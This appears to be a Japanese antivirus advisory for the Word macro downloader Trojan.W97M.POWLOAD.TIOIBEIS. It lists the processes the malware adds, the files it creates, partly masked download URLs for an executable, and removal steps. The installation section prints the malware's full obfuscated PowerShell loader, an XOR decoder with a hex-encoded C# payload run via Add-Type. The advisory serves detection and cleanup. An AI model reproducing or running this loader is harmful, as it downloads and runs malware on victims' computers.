Trojan.W97M.POWLOAD.TIOIBEIS
TrojanDownloader:O97M/Dornoe.A!rfn (Microsoft); Trojan:W32/MalDoc.A (FSecure)
Windows
- マルウェアタイプ: トロイの木馬型
- 破壊活動の有無: なし
- 暗号化:
- 感染報告の有無: はい
概要
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
詳細
侵入方法
マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。
インストール
マルウェアは、以下のプロセスを追加します。
- powershell -WindowStyle Hidden function ue3bf81 {param($q92a8)$c68e9='wbc93e';$q9c3bd='';for ($i=0; $i -lt $q92a8.length;$i+=2){$y592b=[convert]::ToByte($q92a8.Substring($i,2),16);$q9c3bd+=[char]($y592b -bxor $c68e9[($i/2)%$c68e9.length]);}return $q9c3bd;} $g6f836 = '02110a575445241b104d56084c1710505d0257311a4a47001a4c314c5d111e0f06177a0b0307115643361210155050000459164a5a0b104230404011120f4d7d5a04100c0c4a470c1411584c400c1905436a4a1603070e177a2a4c1710505d0257311a4a47001a4c2d5c475e7a68134c51091e01435a5f040411435451014350574268211b0e2a54430a05164b1b5800050c06550057554e265747170e320c505d114a40245c4735050d007857010507104a114c2a42134c51091e01434a4704030b0019561d03071157132c1916334d41451855555d525d5f2b0d4d63110542095f5151404e104d410c1905435a0b544450500d1a5e2c260f557a08070d114d1b471c071157560944504115132019161140630a1e0c17190e45552e0c5857291e001158411c554b3e194310150e0a5a1316030317505045121a175c410b572b0d4d63110542020f0754415a4b4a47171e0c041944534104075d564c4c3927555f2c1a120c4b474d5509064b5d001b51511b1f45320c174b4a35180b0d4d0e47210b114d46041b3211564700141641106e45071701555a0657111758470c144206414700050c435b5c0a1b420101565d11044b705d112716111956534400500a1f303e0c17694717570f060c51505b4216505d115710075c0101124e4356461157170a57474505035a5a574c4c3927555f2c1a120c4b474d5529064b5d001b51511757091b404f19760b03101a695c0c19165e1b61111b2f0c4f5628120f0c4b4a475b42305c47291611177c411718105e5f520904074a641316030317505045121a175c410b57140c505745145b510f0a4d3e0c17694717571002000452424e2a5747350310435b05001657505a1f0c191643545652455b4a024310150e0a5a13160303175050451e0c17194956405707111a1e3e0c17694717570d500f51504151430413044156520f0b4d0207505b555d464a410805551153530c035413525208515512404a10080c114a0c0a0507425450040e2c1916334d414b2d0711561a1e100d175613124f00060b07564c1f2a5747350310435f0a0113045a5b0e0a405407580b4d1851555b0653444e165c0007115a521111564152050803504754530905544152000b02511457560900544553531b1a4c4c0b0511555c1306050051584a2b0d4d6311054c395c410a5e190456470a57155b5b565743515844662c1916334d41451f50510e0a5d4a4a36705d1127161110065e020b0d4d1316435552010a5c4a525850554d56005b5c0b03114a05005701115b01155b5745555a011f550f5653155c100342100d04544f5b5a101a1e100d175613124f00060b07564c1f214047002c3f435b51501204070a0e1e471a50081f550f040515031d4e521e027a0b0332174b1309455a050d0e2816101051520959230f555c063f250f5651041b4a5010082816101051520959210c494a4d1500565c5501444e53155f574f045715004c4c015a0b055c5f0c064e132c1916334d414d115b075d555c154c37567a0b035457111a4e471a530902075e4e0f0b0b03434e501008124f00060b07564d42345c51261b0b065747451451540a57044a0c064e1332120020555a0019164b10081603100a5754451a55555f0b58320c1550410a190f0657474b3007177f5c091307116952111f4a2657450c050d0d54560b034c304956061e030f7f5c09130711177215070e0a5a52111e0d0d7d5211164b481b6f390056515d02064640484c565615045b081b47425b530e02074201411008064455505d524b330d14575f0a160625505f005f17060a51034f534b1b02034654520e075c475b5758065d4657520d07004606535802074754575c06034250520e02044703535a070643525309065c4753535a06514601525f03574653530102524254525d0257554b4f540453115a4a0263171801064a40360303114d7a0b110d435e565345555e5756125732115650000411304d5217032b0d5f5c4d1a55555f0b4c4c321156500004114d6a470405164b5e565345554a0241000317115713554c1f134c51091e01434a4704030b00194011050b0d5e13101251015f0b545f11174b5a0b10421a01575342010010481603100a5754451d04010d04585515015a0a561240584a47171e0c04195253435355010e3603100a57544b320f134d4a5e110d11115a0b03420a04035e1e5e1a015753420100177f0019051751080c5c5f511048070e1606195c52410602010e26180c155c411159360c7b4a11124a1a0157534201001760101511174b5a0b104a0a15014c5b53551008044156520f0b4e4a4a005152175e4a0c0e0501165a4367130f1100570e684d1e4d511013405708055b0752592e065754111f3f4a024e171216164b5d4516545708055d4c1f1e'; $g6f8362 = ue3bf81($g6f836); Add-Type -TypeDefinition $g6f8362; [mbd424]::z375d();
- "%Windows%\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"%User Temp%\csmup_3o.cmdline"
- %Windows%\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%User Temp%\RESC7F0.tmp" "%User Temp%\CSCC7E0.tmp"
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。)
他のシステム変更
マルウェアは、以下のファイルを改変します。
- %Application Data%\Microsoft\Office\Word12.pip
(註:%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。)
作成活動
マルウェアは、以下のファイルを作成します。
- %User Temp%\csmup_3o.err
- %Application Data%\w42d1c1.exe
- %Application Data%\Microsoft\UProof\CUSTOM.DIC
- %User Temp%\csmup_3o.dll
- %User Temp%\csmup_3o.pdb
- %System Root%\BVTBin\Tests\installpackage\csilogfile.log
- %Application Data%\Microsoft\Office\Word12.pip
- %User Temp%\csmup_3o.0.cs
- %User Temp%\csmup_3o.out
- %User Temp%\csmup_3o.cmdline
- {malware file path and name}
(註:%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザー名>\Local Settings\Temp"です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000(32-bit)、XP、Server 2003(32-bit)の場合、通常 "C:\Documents and Settings\<ユーザ名>\Local Settings\Application Data" です。また、Windows Vista、7、8、8.1、2008(64-bit)、2012(64-bit)、10(64-bit)の場合、通常 "C:\Users\<ユーザ名>\AppData\Roaming" です。. %System Root%フォルダは、オペレーティングシステム(OS)が存在する場所で、いずれのOSでも通常、 "C:" です。.)
その他
マルウェアは、以下の不正なWebサイトにアクセスします。
- http://www.{BLOCKED}rmhouse.com/zusk.exe
- http://{BLOCKED}rmhouse.com/zusk.exe
このウイルス情報は、自動解析システムにより作成されました。
対応方法
手順 1
Windows XP、Windows Vista および Windows 7 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。
手順 2
「Trojan.W97M.POWLOAD.TIOIBEIS」で検出したファイル名を確認し、そのファイルを終了します。
- すべての実行中プロセスが、Windows のタスクマネージャに表示されない場合があります。この場合、"Process Explorer" などのツールを使用しマルウェアのファイルを終了してください。"Process Explorer" については、こちらをご参照下さい。
- 検出ファイルが、Windows のタスクマネージャまたは "Process Explorer" に表示されるものの、削除できない場合があります。この場合、コンピュータをセーフモードで再起動してください。
セーフモードについては、こちらをご参照下さい。 - 検出ファイルがタスクマネージャ上で表示されない場合、次の手順にお進みください。
手順 3
以下のファイルを検索し削除します。
- %User Temp%\csmup_3o.err
- %Application Data%\w42d1c1.exe
- %Application Data%\Microsoft\UProof\CUSTOM.DIC
- %User Temp%\csmup_3o.dll
- %User Temp%\csmup_3o.pdb
- %System Root%\BVTBin\Tests\installpackage\csilogfile.log
- %Application Data%\Microsoft\Office\Word12.pip
- %User Temp%\csmup_3o.0.cs
- %User Temp%\csmup_3o.out
- %User Temp%\csmup_3o.cmdline
- {malware file path and name}
手順 4
最新のバージョン(エンジン、パターンファイル)を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.W97M.POWLOAD.TIOIBEIS」と検出したファイルはすべて削除してください。 検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。
手順 5
以下のファイルをバックアップを用いて修復します。マイクロソフト製品に関連したファイルのみに修復されます。このマルウェアが同社製品以外のプログラムをも削除した場合には、該当プログラムを再度インストールする必要があります。
- %Application Data%\Microsoft\Office\Word12.pip
ご利用はいかがでしたか? アンケートにご協力ください